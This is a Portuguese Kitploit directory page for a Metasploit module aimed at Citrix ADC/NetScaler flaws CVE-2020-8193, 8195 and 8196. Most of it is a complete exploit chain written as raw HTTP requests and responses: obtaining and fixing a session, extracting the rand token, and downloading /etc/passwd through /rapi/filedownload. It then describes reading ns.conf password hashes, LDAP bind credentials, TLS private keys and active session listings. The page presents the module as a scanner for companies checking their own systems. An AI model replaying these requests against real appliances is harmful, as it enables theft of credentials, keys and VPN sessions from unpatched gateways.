Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
citrix_adc_netscaler_lfi — Este módulo do Metasploit-Framework pode ser usado para ajudar as empresas a verificar as últimas vulnerabilidades do Citrix CVE-2020-8193, CVE-2020-8195 e CVE-2020-8196 (divulgadas em 08 de julho de 2020). | Kitploit
Ferramentas/GitHubGitHub/zeop-cybersec/citrix_adc_netscaler_lfi
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubzeop-cybersec/citrix_adc_netscaler_lfi

citrix_adc_netscaler_lfi

Este módulo do Metasploit-Framework pode ser usado para ajudar as empresas a verificar as últimas vulnerabilidades do Citrix CVE-2020-8193, CVE-2020-8195 e CVE-2020-8196 (divulgadas em 08 de julho de 2020).

Ver Repositório
643há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

citrix_adc_netscaler_lfi_scan

alt text

Este módulo do Metasploit-Framework pode ser usado para ajudar empresas a verificar as últimas vulnerabilidades do Citrix (divulgadas em 08 de julho de 2020).

  • CVE-2020-8193
  • CVE-2020-8195
  • CVE-2020-8196

A divulgação pública em 8 de julho de 2020 por Donny Maasland discutiu como a vulnerabilidade poderia ser explorada.

Em 10 de julho, RIFT confirmou que esta vulnerabilidade pode ser usada para extrair sessões VPN válidas de uma instância vulnerável.

Leia mais sobre isso no Twitter:

  • Citrix emite patches críticos para 11 novas falhas que afetam vários produtos
  • Hackers estão ativamente escaneando e constantemente tentando explorar vulnerabilidades do Citrix ADC

Requests

0x1 create_session (início)

Primeiro, você precisa obter o ID da sessão.

root@kitploit:~
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: 192.168.7.2 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) X-NITRO-USER: LCGSfX X-NITRO-PASS: fYiZon Content-Type: application/xml Content-Length: 44 Connection: close <appfwprofile><login></login></appfwprofile>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:23 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Set-Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

0x2 fix_session_rand

Em seguida, você precisa corrigir a sessão. Você pode aproveitar esta etapa para obter o valor rand (e poupar a si mesmo uma requisição adicional para /menu/stc).

root@kitploit:~
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
Content-Type: application/x-www-form-urlencoded
Connection: close
root@kitploit:~
HTTP/1.1 302 Found
Date: Tue, 14 Jul 2020 09:13:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=0; expires=Fri, 09-Jul-2021 09:13:27 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
X-XSS-Protection: 1; mode=block
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Você precisa seguir o redirecionamento.

root@kitploit:~
GET /menu/neo HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
Content-Type: application/x-www-form-urlencoded
Connection: close

E obtenha o valor rand do corpo da resposta.

root@kitploit:~
HTTP/1.1 200 OK
Date: Tue, 14 Jul 2020 09:13:30 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: startupapp=neo; expires=Fri, 09-Jul-2021 09:13:30 GMT; Max-Age=31104000; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Length: 1590
Connection: close
Content-Type: text/html;application/octet-stream;application/ecmascript;application/json;application/xml;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Configuration</title>
<script type="text/javascript">var neo_logout_url = "/menu/lo?rand=478257144.1894793017920341";</script>
<script type="text/javascript">var neo_machine_sysid = "450092";var rand = "478257144.1894793017920341";var partition_dir = "";var is_ha_supported_in_gui = "true";var login_warning = "";</script>
<script type="text/javascript">var global_data = "{global_data}";</script>
<link href="/admin_ui/rdx/core/css/rdx.css" rel="stylesheet" type="text/css"/>
<link href="/admin_ui/neo/css/neo.css" rel="stylesheet" type="text/css"/>
<!--[if IE]> <style type="text/css"> .form td input[type="submit"] { width: 50px; } </style> <![endif]-->
<script type="text/javascript" src="/admin_ui/rdx/core/js/rdx.js"></script>
<script type="text/javascript" src="/menu/branding"></script>
<script type="text/javascript" src="/menu/neoglobaldata"></script>
<script type="text/javascript" src="/menu/neoa?gui_token=478257144.1894793017920341"></script>
<script type="text/javascript" src="/admin_ui/neo/js/neo.js"></script>
<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_win.js"></script>
<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_mac.js"></script>
</head>
<body class="ns_body">
</body>
</html>

0x3 create_session (quebra)

root@kitploit:~
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
X-NITRO-USER: PjdFbLCc
X-NITRO-PASS: xyFoLmXD
Content-Type: application/xml
Content-Length: 44
Connection: close

<appfwprofile><login></login></appfwprofile>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

0x4 read_lfi

root@kitploit:~
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
X-NITRO-USER: UGjkHm
X-NITRO-PASS: NbIEBHxw
rand_key: 478257144.1894793017920341
Content-Type: application/xml
Content-Length: 31
Connection: close

<clipermission></clipermission>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:37 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="passwd"
Accept-Ranges: bytes
Content-Length: 465
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/octet-stream

root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/netscaler/nssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin

Desenvolvimento do Exploit e Impacto

Um atacante pode aproveitar esta vulnerabilidade para obter informações confidenciais em sistemas Citrix vulneráveis.

Uma pequena visão geral do que observamos em um Citrix Netscaler 12.1 build 55.18.

  • Possibilidade de ler /nsconfig/ns.conf:

Este é o arquivo de configuração do Netscaler. Ele contém os hashes dos usuários autorizados a se conectar ao Netscaler via SSH (incluindo o usuário nsroot). Este arquivo também contém outras informações, como as usadas para vincular um Active Directory (por exemplo).

Algumas saídas interessantes:

root@kitploit:~
set system user nsroot 35b7a39540c7f42a4c85455a750fed309e506d6d83fcaae83 -encrypted -hashmethod SHA1
add authentication ldapAction 192.168.7.3_LDAP -serverIP 192.168.7.3 -serverPort 636 -ldapBase "DC=prod,DC=contoso,DC=com" -ldapBindDn [email protected] -ldapBindDnPassword 36e2fd1867ca398c68f45c7c54dfa56988c3464ff2a3acf48887091292fb58f5 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName
add ssl certKey ns-server-certificate -cert ns-server.cert -key ns-server.key

alt text

  • Possibilidade de ler /nsconfig/ssl/ns-server.key (e todos os outros arquivos de certificado):

É a chave do certificado para TLS.

alt text

  • Capacidade de listar o diretório /var/nstmp:

Geralmente não é comum listar diretórios a partir de um LFI. Um atacante pode usar isso para "encontrar seu caminho" no sistema de arquivos. O diretório /var/nstmp contém a lista de sessões ativas.

alt text

Sistemas Vulneráveis

CVE-2020-8193: Controle de acesso impróprio no Citrix ADC e no Citrix Gateway em versões anteriores a 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 e 10.5-70.18 e no Citrix SDWAN WAN-OP em versões anteriores a 11.1.1a, 11.0.3d e 10.2.7 permite acesso não autenticado a determinados endpoints de URL.

Severidade e métricas CVSS 3.x:

  • Pontuação base: 6.5 (MEDIUM)
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVE-2020-8195: Validação de entrada imprópria no Citrix ADC e no Citrix Gateway em versões anteriores a 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 e 10.5-70.18 e no Citrix SDWAN WAN-OP em versões anteriores a 11.1.1a, 11.0.3d e 10.2.7, resultando em divulgação limitada de informações para usuários com privilégios baixos.

Severidade e métricas CVSS 3.x:

  • Pontuação base: 6.5 (MEDIUM)
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2020-8196: Controle de acesso impróprio no Citrix ADC e no Citrix Gateway em versões anteriores a 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 e 10.5-70.18 e no Citrix SDWAN WAN-OP em versões anteriores a 11.1.1a, 11.0.3d e 10.2.7, resultando em divulgação limitada de informações para usuários com privilégios baixos.

Severidade e métricas CVSS 3.x:

  • Pontuação base: 4.3 (MEDIUM)
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Baixar ferramenta